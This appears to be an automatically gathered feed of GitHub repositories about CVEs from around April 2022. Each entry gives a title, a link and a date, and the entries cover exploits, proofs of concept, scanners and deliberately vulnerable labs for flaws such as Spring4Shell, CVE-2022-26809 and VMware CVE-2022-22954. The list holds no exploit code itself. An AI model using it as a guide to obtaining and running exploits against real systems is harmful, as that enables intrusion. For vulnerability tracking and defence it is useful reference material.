**no description** : [MagicPiperSec/WPS-CVE-2022-24934](https://github.com/MagicPiperSec/WPS-CVE-2022-24934) create time: 2022-04-15T09:08:00Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331) create time: 2022-04-15T05:45:49Z

**S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE** : [Wrin9/CVE-2021-31805](https://github.com/Wrin9/CVE-2021-31805) create time: 2022-04-15T04:23:44Z

**CVE-2022-26809-RCE-EXP-POC** : [SeptS9119/CVE-2022-26809](https://github.com/SeptS9119/CVE-2022-26809) create time: 2022-04-15T04:35:41Z

**CVE-2022-26809-RCE-EXP** : [gitcomit/scemer2](https://github.com/gitcomit/scemer2) create time: 2022-04-15T04:27:58Z

**CVE-2022-26809-RCE-EXP** : [genieyou/CVE-2022-26809-RCE](https://github.com/genieyou/CVE-2022-26809-RCE) create time: 2022-04-15T04:13:22Z

**远程代码执行S2-062 CVE-2021-31805验证POC** : [YanMu2020/s2-062](https://github.com/YanMu2020/s2-062) create time: 2022-04-15T01:50:14Z

**CVE-2022-26809-RCE-EXP** : [SeptS9119/CVE-2022-26809-RCE](https://github.com/SeptS9119/CVE-2022-26809-RCE) create time: 2022-04-15T03:19:22Z

**no description** : [3SsFuck/CVE-2022-22954-POC](https://github.com/3SsFuck/CVE-2022-22954-POC) create time: 2022-04-15T02:24:22Z

**no description** : [SeptS0/CVE-2022-26809-RCE](https://github.com/SeptS0/CVE-2022-26809-RCE) create time: 2022-04-14T23:42:17Z

**Proof of Concept for exploiting VMware CVE-2022-22954** : [tyleraharrison/VMware-CVE-2022-22954-Command-Injector](https://github.com/tyleraharrison/VMware-CVE-2022-22954-Command-Injector) create time: 2022-04-14T23:38:06Z

**no description** : [Neimar47574/CVE-2022-24087](https://github.com/Neimar47574/CVE-2022-24087) create time: 2022-04-14T16:56:08Z

**no description** : [h0cksr/Fastjson--CVE-2017-18349-](https://github.com/h0cksr/Fastjson--CVE-2017-18349-) create time: 2022-04-14T16:31:46Z

**no description** : [astyn9/Exploit-Medium-CVE-2021-41184](https://github.com/astyn9/Exploit-Medium-CVE-2021-41184) create time: 2022-04-14T13:42:54Z

**no description** : [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149) create time: 2022-04-14T13:24:51Z

**Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)** : [k3rwin/spring-cloud-function-rce](https://github.com/k3rwin/spring-cloud-function-rce) create time: 2022-04-14T11:10:50Z

**CVE-2022-0185 exploit** : [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit) create time: 2022-04-14T10:46:04Z

**no description** : [auduongxuan/CVE-2022-26809](https://github.com/auduongxuan/CVE-2022-26809) create time: 2022-04-14T08:21:10Z

**Remote Code Execution Exploit in the RPC Library** : [websecnl/CVE-2022-26809](https://github.com/websecnl/CVE-2022-26809) create time: 2022-04-14T08:12:24Z

**no description** : [mr-r3b00t/cve-2022-26809](https://github.com/mr-r3b00t/cve-2022-26809) create time: 2022-04-14T07:50:16Z

**no description** : [sh-ubh/CVE-2018-1002105](https://github.com/sh-ubh/CVE-2018-1002105) create time: 2022-04-06T22:28:24Z

**no description** : [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149) create time: 2022-04-14T06:17:18Z

**非常感谢yunxu1师傅提供的源码** : [VVeakee/CVE-2017-12149](https://github.com/VVeakee/CVE-2017-12149) create time: 2022-04-14T03:30:54Z

**The poc for CVE-2022-26809 RCE via RPC will be updated here.** : [sherlocksecurity/Microsoft-CVE-2022-26809](https://github.com/sherlocksecurity/Microsoft-CVE-2022-26809) create time: 2022-04-14T03:41:32Z

**no description** : [0xkasra/CVE-2015-6967](https://github.com/0xkasra/CVE-2015-6967) create time: 2022-04-14T01:57:39Z

**no description** : [0xkasra/CVE-2017-5638](https://github.com/0xkasra/CVE-2017-5638) create time: 2022-04-14T02:48:22Z

**PoC for CVE-2017-0075** : [MarkusCarelli1/4B5F5F4Bp](https://github.com/MarkusCarelli1/4B5F5F4Bp) create time: 2022-04-14T02:16:31Z

**no description** : [0xkasra/CVE-2019-11447](https://github.com/0xkasra/CVE-2019-11447) create time: 2022-04-14T01:45:04Z

**no description** : [AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection](https://github.com/AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection) create time: 2022-04-13T19:44:19Z

**PoC of CVE-2021-30731** : [osy/WebcamViewer](https://github.com/osy/WebcamViewer) create time: 2022-04-13T06:13:24Z

**CVE-2022-26809 PoC** : [f8al/CVE-2022-26809](https://github.com/f8al/CVE-2022-26809) create time: 2022-04-13T18:00:01Z

**cve-2020-27955** : [userxfan/cve-2020-27955](https://github.com/userxfan/cve-2020-27955) create time: 2022-04-13T17:16:48Z

**CVE-2022-22965-PoC** : [jeremy-cxf/CVE-2022-22965-PoC](https://github.com/jeremy-cxf/CVE-2022-22965-PoC) create time: 2022-04-13T16:25:25Z

**CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本** : [bewhale/CVE-2022-22954](https://github.com/bewhale/CVE-2022-22954) create time: 2022-04-13T16:18:56Z

**POC For CVE-2022-24483** : [waleedassar/CVE-2022-24483](https://github.com/waleedassar/CVE-2022-24483) create time: 2022-04-12T18:04:29Z

**spring4shell | CVE-2022-22965** : [0zvxr/CVE-2022-22965](https://github.com/0zvxr/CVE-2022-22965) create time: 2022-04-12T14:59:42Z

**no description** : [Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316](https://github.com/Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316) create time: 2022-04-13T12:51:46Z

**Spring4Shell , Spring Framework RCE (CVE-2022-22965) , Burpsuite Plugin** : [Loneyers/Spring4Shell](https://github.com/Loneyers/Spring4Shell) create time: 2022-04-11T12:37:58Z

**no description** : [jfrog/jfrog-CVE-2022-24675](https://github.com/jfrog/jfrog-CVE-2022-24675) create time: 2022-04-13T09:05:33Z

**Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure** : [Acceis/exploit-CVE-2022-0482](https://github.com/Acceis/exploit-CVE-2022-0482) create time: 2022-04-13T09:00:44Z

**VMware Workspace ONE Access and Identity Manager RCE via SSTI - Test script with in modes.** : [tunelko/CVE-2022-22954-PoC](https://github.com/tunelko/CVE-2022-22954-PoC) create time: 2022-04-13T08:52:15Z

**not an exploit or a poc** : [killvxk/CVE-2022-26809](https://github.com/killvxk/CVE-2022-26809) create time: 2022-04-13T07:23:46Z

**VMware Workspace ONE Access远程代码执行漏洞 / Code By:Jun_sheng** : [Jun-5heng/CVE-2022-22954](https://github.com/Jun-5heng/CVE-2022-22954) create time: 2022-04-13T04:25:54Z

**exploitation script tryhackme** : [Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-](https://github.com/Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965-) create time: 2022-04-13T00:15:55Z

**PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection** : [DrorDvash/CVE-2022-22954_VMware_PoC](https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC) create time: 2022-04-12T21:15:27Z

**no description** : [Wangsafz/cve-2017-0358.sh](https://github.com/Wangsafz/cve-2017-0358.sh) create time: 2022-04-12T14:44:13Z

**no description** : [Chocapikk/CVE-2021-41773](https://github.com/Chocapikk/CVE-2021-41773) create time: 2022-04-12T13:25:58Z

**Scanner for network for CVE-2005-1794.** : [InitRoot/CVE-2005-1794Scanner](https://github.com/InitRoot/CVE-2005-1794Scanner) create time: 2022-04-12T12:18:12Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188) create time: 2022-04-12T12:25:22Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688) create time: 2022-04-12T11:40:23Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506) create time: 2022-04-12T11:02:00Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600) create time: 2022-04-12T10:53:20Z

**no description** : [Greenwolf/CVE-2022-1175](https://github.com/Greenwolf/CVE-2022-1175) create time: 2022-04-12T11:00:56Z

**no description** : [Greenwolf/CVE-2022-1162](https://github.com/Greenwolf/CVE-2022-1162) create time: 2022-04-12T10:56:10Z

**CVE-2022-22954 Açığı test etme** : [MSeymenD/CVE-2022-22954-Testi](https://github.com/MSeymenD/CVE-2022-22954-Testi) create time: 2022-04-12T09:35:17Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188) create time: 2022-04-12T08:55:40Z

**no description** : [mumu2020629/-CVE-2022-22954-scanner](https://github.com/mumu2020629/-CVE-2022-22954-scanner) create time: 2022-04-12T08:36:33Z

**no description** : [lucksec/VMware-CVE-2022-22954](https://github.com/lucksec/VMware-CVE-2022-22954) create time: 2022-04-12T06:35:10Z

**提供单个或批量URL扫描是否存在CVE-2022-22954功能** : [axingde/CVE-2022-22954-POC](https://github.com/axingde/CVE-2022-22954-POC) create time: 2020-10-09T10:14:50Z

**CVE-2022-22954-VMware-RCE批量检测POC** : [chaosec2021/CVE-2022-22954-VMware-RCE](https://github.com/chaosec2021/CVE-2022-22954-VMware-RCE) create time: 2022-04-12T05:48:24Z

**Local privilege escalation for OS X 10.10.5 via CVE-2016-1828.** : [zqlblingzs/bazad5](https://github.com/zqlblingzs/bazad5) create time: 2022-04-12T04:20:14Z

**CMPT733 Cybersecurity Lab II Project: GDB plugin for heap exploits inspired by CVE-2021-3156** : [ypl6/heaplens](https://github.com/ypl6/heaplens) create time: 2022-03-22T00:55:51Z

**提供批量扫描URL以及执行命令功能。Workspace ONE Access 模板注入漏洞,可执行任意代码** : [jax7sec/CVE-2022-22954](https://github.com/jax7sec/CVE-2022-22954) create time: 2022-04-12T04:14:36Z

**TerraMaster TOS Unauthenticated Attacker Vulnerability CVE-2022-24990** : [antx-code/CVE-2022-24990](https://github.com/antx-code/CVE-2022-24990) create time: 2022-04-12T02:45:56Z

**no description** : [aniqfakhrul/CVE-2022-22954](https://github.com/aniqfakhrul/CVE-2022-22954) create time: 2022-04-11T23:21:50Z

**CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager** : [Vulnmachines/VMWare_CVE-2022-22954](https://github.com/Vulnmachines/VMWare_CVE-2022-22954) create time: 2022-04-11T19:46:56Z

**Exploiting CVE 2003-0264 with a buffer-overflow attack using Python3** : [vaknin/SLMail5.5](https://github.com/vaknin/SLMail5.5) create time: 2022-04-11T19:13:14Z

**POC for VMWARE CVE-2022-22954** : [sherlocksecurity/VMware-CVE-2022-22954](https://github.com/sherlocksecurity/VMware-CVE-2022-22954) create time: 2022-04-11T13:59:23Z

**no description** : [nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827) create time: 2022-04-11T13:57:41Z

**Spring4Shell (CVE-2022-22965)** : [zer0yu/CVE-2022-22965](https://github.com/zer0yu/CVE-2022-22965) create time: 2022-04-01T12:37:32Z

**no description** : [nanopathi/external_expat_AOSP10_r33_CVE-2021-46143](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-46143) create time: 2022-04-11T12:29:22Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333) create time: 2022-04-11T12:14:18Z

**no description** : [nanopathi/external_expat_AOSP10_r33_CVE-2021-45960](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-45960) create time: 2022-04-11T11:45:57Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0314](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0314) create time: 2022-04-11T10:29:13Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439) create time: 2022-04-11T10:13:43Z

**no description** : [Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138) create time: 2022-04-11T09:48:51Z

**no description** : [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0138) create time: 2022-04-11T09:20:41Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0391) create time: 2022-04-11T08:57:29Z

**burp被动扫描插件,目前只有CVE-2022-22947** : [F6JO/Burp_VulPscan](https://github.com/F6JO/Burp_VulPscan) create time: 2022-04-11T06:19:24Z

**CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation.** : [Giler2004/bazad1](https://github.com/Giler2004/bazad1) create time: 2022-04-10T15:50:41Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2021-0507](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0507) create time: 2022-04-10T08:26:52Z

**no description** : [f01965/CVE-2018-5146](https://github.com/f01965/CVE-2018-5146) create time: 2022-04-10T02:12:37Z

**no description** : [f01965/CVE-2019-8014](https://github.com/f01965/CVE-2019-8014) create time: 2022-04-10T00:53:46Z

**no description** : [persian64/CVE-2014-6271](https://github.com/persian64/CVE-2014-6271) create time: 2022-04-09T21:24:12Z

**no description** : [persian64/CVE-2007-2447](https://github.com/persian64/CVE-2007-2447) create time: 2022-04-09T21:12:11Z

**Script to check for Spring4Shell vulnerability** : [jrgdiaz/Spring4Shell-CVE-2022-22965.py](https://github.com/jrgdiaz/Spring4Shell-CVE-2022-22965.py) create time: 2022-04-09T08:40:49Z

**phpunit-shell | CVE_2017-9841** : [0zvxr/CVE-2017-9841](https://github.com/0zvxr/CVE-2017-9841) create time: 2022-04-09T11:12:58Z

**no description** : [fransvanbuul/CVE-2022-22965-susceptibility](https://github.com/fransvanbuul/CVE-2022-22965-susceptibility) create time: 2022-04-09T07:45:08Z

**no description** : [mappl3/CVE-2019-0841](https://github.com/mappl3/CVE-2019-0841) create time: 2022-04-09T05:19:25Z

**Config files for my GitHub profile.** : [cveiga2008/cveiga2008](https://github.com/cveiga2008/cveiga2008) create time: 2022-04-08T22:15:46Z

**Ported golang version of dirtycow.c** : [ArkAngeL43/CVE-2016-5195](https://github.com/ArkAngeL43/CVE-2016-5195) create time: 2022-04-08T18:18:36Z

**POC for the priv esc exploit in PKEXEC [ CVE -2021-4034 ] ( needs fixing, not the best) Converted into go** : [ArkAngeL43/CVE-2021-4034](https://github.com/ArkAngeL43/CVE-2021-4034) create time: 2022-04-08T17:55:53Z

**A DoS exploit for CVE-2022-21907** : [polakow/CVE-2022-21907](https://github.com/polakow/CVE-2022-21907) create time: 2022-04-04T10:53:28Z

**just using this for a some labs** : [Omega-Void/cve-2018-2574](https://github.com/Omega-Void/cve-2018-2574) create time: 2022-04-08T17:14:58Z

**no description** : [CalumHutton/CVE-2022-22965-PoC_Payara](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara) create time: 2022-04-07T15:26:15Z

**Add revert shell** : [cuongtop4598/CVE-2021-3129-Script](https://github.com/cuongtop4598/CVE-2021-3129-Script) create time: 2022-04-08T06:34:17Z

**no description** : [Adash7/CVE-2021-42013](https://github.com/Adash7/CVE-2021-42013) create time: 2022-04-08T06:07:37Z

**no description** : [0vercl0k/CVE-2022-28281](https://github.com/0vercl0k/CVE-2022-28281) create time: 2022-04-08T02:49:09Z

**no description** : [Will-Beninger/CVE-2022-22965_SpringShell](https://github.com/Will-Beninger/CVE-2022-22965_SpringShell) create time: 2022-04-07T18:48:43Z

**no description** : [tmatejicek/CVE-2015-1397](https://github.com/tmatejicek/CVE-2015-1397) create time: 2022-04-07T17:01:22Z

**Spring Cloud Config CVE-2019-3799|CVE_2020_5410 漏洞检测** : [Corgizz/SpringCloud](https://github.com/Corgizz/SpringCloud) create time: 2022-04-07T14:51:52Z

**no description** : [mr-r3bot/ManageEngine-CVE-2020-28653](https://github.com/mr-r3bot/ManageEngine-CVE-2020-28653) create time: 2022-04-07T14:13:29Z

**no description** : [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520) create time: 2022-04-07T13:14:03Z

**Spring4Shell PoC (CVE-2022-22965)** : [t3amj3ff/Spring4ShellPoC](https://github.com/t3amj3ff/Spring4ShellPoC) create time: 2022-04-07T09:13:11Z

**no description** : [nanopathi/linux-4.19.72_CVE-2020-14381](https://github.com/nanopathi/linux-4.19.72_CVE-2020-14381) create time: 2022-04-07T07:28:17Z

**no description** : [persian64/CVE-2012-4869](https://github.com/persian64/CVE-2012-4869) create time: 2022-04-07T04:13:13Z

**no description** : [persian64/CVE-2019-16113_](https://github.com/persian64/CVE-2019-16113_) create time: 2022-04-07T03:57:15Z

**CVE-2022-22965写入冰蝎webshell脚本** : [4nth0ny1130/spring4shell_behinder](https://github.com/4nth0ny1130/spring4shell_behinder) create time: 2022-04-07T03:50:14Z

**CVE-2022-22965 pocsuite3 POC** : [wikiZ/springboot_CVE-2022-22965](https://github.com/wikiZ/springboot_CVE-2022-22965) create time: 2022-04-07T02:30:26Z

**no description** : [hoaan1995/CVE-2018-9995](https://github.com/hoaan1995/CVE-2018-9995) create time: 2022-04-07T00:37:26Z

**Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)** : [alt3kx/CVE-2022-22965](https://github.com/alt3kx/CVE-2022-22965) create time: 2022-04-07T00:08:16Z

**springFramework_CVE-2022-22965_RCE简单利用** : [liangyueliangyue/spring-core-rce](https://github.com/liangyueliangyue/spring-core-rce) create time: 2022-03-31T13:02:18Z

**Unauthenticated RCE exploit for Fantec MWiD25-DS** : [code-byter/CVE-2022-28113](https://github.com/code-byter/CVE-2022-28113) create time: 2022-03-26T21:39:00Z

**no description** : [irgoncalves/irule-cve-2022-22965](https://github.com/irgoncalves/irule-cve-2022-22965) create time: 2022-04-06T02:17:36Z

**no description** : [vuongnv3389-sec/CVE-2019-20372](https://github.com/vuongnv3389-sec/CVE-2019-20372) create time: 2022-04-06T16:53:28Z

**[CVE-2010-2078] Exploit for UnrealIrcd 3.2.8.1 version (custom modification from a perl script simplifying all posible for bash scripting)** : [0bfxgh0st-secondary/UnrealIrcd-3.2.8.1-cve-2010-2075-exploit](https://github.com/0bfxgh0st-secondary/UnrealIrcd-3.2.8.1-cve-2010-2075-exploit) create time: 2022-04-06T15:52:57Z

**no description** : [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909) create time: 2022-04-06T16:18:32Z

**no description** : [vuongnv3389-sec/cve-2021-41773](https://github.com/vuongnv3389-sec/cve-2021-41773) create time: 2022-04-06T14:53:19Z

**CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi** : [Cyb3rR3ap3r/CVE-2022-26631](https://github.com/Cyb3rR3ap3r/CVE-2022-26631) create time: 2022-04-06T15:05:47Z

**Exploit a vulnerable Spring application with the Spring4Shell (CVE-2022-22965) Vulnerability.** : [FourCoreLabs/spring4shell-exploit-poc](https://github.com/FourCoreLabs/spring4shell-exploit-poc) create time: 2022-03-31T15:01:12Z

**Spring-Cloud-Spel-RCE** : [Ha0Liu/CVE-2022-22947](https://github.com/Ha0Liu/CVE-2022-22947) create time: 2022-04-06T09:40:05Z

**The demo code showing the recent Spring4Shell RCE (CVE-2022-22965)** : [datawiza-inc/spring-rec-demo](https://github.com/datawiza-inc/spring-rec-demo) create time: 2022-04-06T04:17:51Z

**RHSB-2022-002 Dirty Pipe - kernel arbitrary file manipulation - (CVE-2022-0847)** : [mhanief/dirtypipe](https://github.com/mhanief/dirtypipe) create time: 2022-04-06T03:29:03Z

**A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.** : [LudovicPatho/CVE-2022-22965_Spring4Shell](https://github.com/LudovicPatho/CVE-2022-22965_Spring4Shell) create time: 2022-04-05T20:34:36Z

**CVE-2022-22963 research** : [SealPaPaPa/SpringCloudFunction-Research](https://github.com/SealPaPaPa/SpringCloudFunction-Research) create time: 2022-04-05T17:06:55Z

**Exploit Of Spring4Shell!** : [robiul-awal/CVE-2022-22965](https://github.com/robiul-awal/CVE-2022-22965) create time: 2022-04-05T15:45:47Z

**Spring Framework RCE Exploit** : [luoqianlin/CVE-2022-22965](https://github.com/luoqianlin/CVE-2022-22965) create time: 2022-04-05T15:41:26Z

**Spring4Shell is a critical RCE vulnerability in the Java Spring Framework and is one of three related vulnerabilities published on March 30** : [xnderLAN/CVE-2022-22965](https://github.com/xnderLAN/CVE-2022-22965) create time: 2022-04-05T15:12:15Z

**no description** : [helGayhub233/CVE-2019-1653](https://github.com/helGayhub233/CVE-2019-1653) create time: 2022-04-05T14:01:13Z

**CVE-2022-22947 reproduce** : [aesm1p/CVE-2022-22947-POC-Reproduce](https://github.com/aesm1p/CVE-2022-22947-POC-Reproduce) create time: 2022-04-05T10:11:03Z

**Spring has Confirmed the RCE in Spring Framework. The team has just published the statement along with the mitigation guides for the issue. Now, this vulnerability can be tracked as CVE-2022-22965.** : [Snip3R69/spring-shell-vuln](https://github.com/Snip3R69/spring-shell-vuln) create time: 2022-04-05T09:35:41Z

**CVE-2020-24186的攻击脚本** : [Sakura-501/CVE-2020-24186-exploit](https://github.com/Sakura-501/CVE-2020-24186-exploit) create time: 2022-04-05T08:31:56Z

**CVE-2021-22555 exploit rewritten with pipe primitive** : [veritas501/CVE-2021-22555-PipeVersion](https://github.com/veritas501/CVE-2021-22555-PipeVersion) create time: 2022-04-05T06:35:25Z

**CVE-2022-0185 exploit rewritten with pipe primitive** : [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion) create time: 2022-04-05T07:48:35Z

**CVE-2022-25636 exploit rewritten with pipe primitive** : [veritas501/CVE-2022-25636-PipeVersion](https://github.com/veritas501/CVE-2022-25636-PipeVersion) create time: 2022-04-05T07:08:09Z

**Exploitation of CVE-2022-22639** : [jhftss/CVE-2022-22639](https://github.com/jhftss/CVE-2022-22639) create time: 2022-03-17T06:16:54Z

**CVE-2021-41773 | CVE-2021-42013 Exploiter Tool** : [CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit) create time: 2022-04-04T22:07:21Z

**Vulnerability scanner for Spring4Shell (CVE-2022-22965)** : [fracturelabs/go-scan-spring](https://github.com/fracturelabs/go-scan-spring) create time: 2022-04-04T21:01:26Z

**Another spring4shell (Spring core RCE) POC** : [netcode/Spring4shell-CVE-2022-22965-POC](https://github.com/netcode/Spring4shell-CVE-2022-22965-POC) create time: 2022-04-04T20:16:06Z

**no description** : [yywing/cve-2022-0778](https://github.com/yywing/cve-2022-0778) create time: 2022-04-04T18:09:06Z

**Spring4Shell - CVE-2022-22965** : [twseptian/cve-2022-22965](https://github.com/twseptian/cve-2022-22965) create time: 2022-04-04T16:43:03Z

**POC to prove springshell CVE 2022-22965** : [anair-it/springshell-vuln-POC](https://github.com/anair-it/springshell-vuln-POC) create time: 2022-04-04T16:04:55Z

**Spring4Shell vulnerability Proof of Concept** : [sunnyvale-it/CVE-2022-22965-PoC](https://github.com/sunnyvale-it/CVE-2022-22965-PoC) create time: 2022-04-04T13:44:39Z

**Intentionally vulnerable Spring app to test CVE-2022-22965** : [fracturelabs/spring4shell_victim](https://github.com/fracturelabs/spring4shell_victim) create time: 2022-04-04T13:35:56Z

**Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite.** : [superMan7912002/bazad3](https://github.com/superMan7912002/bazad3) create time: 2022-04-04T12:58:14Z

**PowerShell port of CVE-2022-22965 vulnerability check by colincowie.** : [daniel0x00/Invoke-CVE-2022-22965-SafeCheck](https://github.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck) create time: 2022-04-04T10:37:27Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2021-0476](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0476) create time: 2022-04-04T07:35:45Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2020-0471](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0471) create time: 2022-04-04T06:41:12Z

**no description** : [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377) create time: 2022-04-04T04:52:47Z

**no description** : [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413) create time: 2022-04-04T04:44:39Z

**Nmap Spring4Shell NSE script for Spring Boot RCE (CVE-2022-22965)** : [gpiechnik2/nmap-spring4shell](https://github.com/gpiechnik2/nmap-spring4shell) create time: 2022-04-03T01:27:28Z

**Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965** : [me2nuk/CVE-2022-22965](https://github.com/me2nuk/CVE-2022-22965) create time: 2022-04-01T13:35:01Z

**no description** : [persian64/CVE-2018-7600](https://github.com/persian64/CVE-2018-7600) create time: 2022-04-03T22:45:53Z

**Atlassian Jira XSS attack via Server Side Request Forgery (SSRF).** : [labsbots/CVE-2017-9506](https://github.com/labsbots/CVE-2017-9506) create time: 2022-04-03T16:23:13Z

**Apache forward request CVE** : [Kashkovsky/CVE-2021-40438](https://github.com/Kashkovsky/CVE-2021-40438) create time: 2022-04-03T15:24:24Z

**no description** : [selectarget/laravel-CVE-2021-3129-EXP](https://github.com/selectarget/laravel-CVE-2021-3129-EXP) create time: 2022-04-03T14:06:29Z

**Linux “Dirty Pipe” vulnerability gives unprivileged users root access** : [xnderLAN/CVE-2022-0847](https://github.com/xnderLAN/CVE-2022-0847) create time: 2022-04-03T14:08:54Z

**A Java application intentionally vulnerable to CVE-2021-44228** : [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin) create time: 2022-01-16T16:39:19Z

**List of CVE-2020-*** : [mcdulltii/CVE-2020](https://github.com/mcdulltii/CVE-2020) create time: 2022-03-29T09:44:40Z

**0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119** : [shi10587s/Sauercloude](https://github.com/shi10587s/Sauercloude) create time: 2022-04-03T09:46:03Z

**Environment for CVE-2021-41773 recreation.** : [bernardas/netsec-polygon](https://github.com/bernardas/netsec-polygon) create time: 2022-04-02T16:34:45Z

**Spring Cloud Function SpEL - cve-2022-22963** : [twseptian/cve-2022-22963](https://github.com/twseptian/cve-2022-22963) create time: 2022-04-03T06:45:51Z

**Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5** : [itsecurityco/CVE-2022-22965](https://github.com/itsecurityco/CVE-2022-22965) create time: 2022-04-03T06:43:07Z

**File upload to Remote Code Execution on Zenario CMS 9.0.54156** : [minhnq22/CVE-2021-42171](https://github.com/minhnq22/CVE-2021-42171) create time: 2021-09-30T02:44:19Z

**no description** : [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016) create time: 2022-04-02T22:49:40Z

**no description** : [mwojterski/cve-2022-22965](https://github.com/mwojterski/cve-2022-22965) create time: 2022-04-02T19:47:47Z

**CVE-2022-23131漏洞利用工具开箱即用。** : [Kazaf6s/CVE-2022-23131-](https://github.com/Kazaf6s/CVE-2022-23131-) create time: 2022-04-02T18:16:56Z

**no description** : [asurti6783/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536](https://github.com/asurti6783/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536) create time: 2022-04-02T16:12:56Z

**DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.** : [drapl0n/dirtypipe](https://github.com/drapl0n/dirtypipe) create time: 2022-04-02T13:49:03Z

**no description** : [d0l0sapth3/cve20186574](https://github.com/d0l0sapth3/cve20186574) create time: 2022-04-02T12:50:30Z

**CVE-2022-22965\Spring-Core-RCE堪比关于 Apache Log4j2核弹级别漏洞exp的rce一键利用** : [wjl110/CVE-2022-22965_Spring_Core_RCE](https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE) create time: 2022-04-02T09:13:54Z

**ActiveMQ系列漏洞探测利用工具,包括ActiveMQ 默认口令漏洞及ActiveMQ任意文件写入漏洞(CVE-2016-3088),支持批量探测利用。** : [YutuSec/ActiveMQ_Crack](https://github.com/YutuSec/ActiveMQ_Crack) create time: 2022-04-02T08:40:10Z

